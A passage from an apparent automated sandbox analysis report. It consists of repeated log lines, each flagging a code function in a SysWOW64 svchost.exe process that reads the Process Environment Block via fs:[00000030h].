                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]2_2_03B0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]2_2_03B062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]2_2_03B0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]2_2_03B04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]2_2_03B04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]2_2_03A280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]2_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]2_2_03AE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]2_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]2_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
